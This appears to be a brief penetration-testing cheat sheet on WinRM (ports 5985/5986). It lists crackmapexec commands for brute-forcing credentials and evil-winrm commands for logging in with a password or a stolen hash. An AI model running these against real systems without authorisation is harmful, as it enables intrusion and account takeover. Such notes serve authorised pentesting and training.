Skip to content

5985,5986 - Pentesting winrm


WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.


bruteforce user / password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success


evil-winrm - with password

evil-winrm -u $USER -p $PASS -i $IP
evil-winrm - with hash
evil-winrm -u <username> -H <Hash> -i <IP>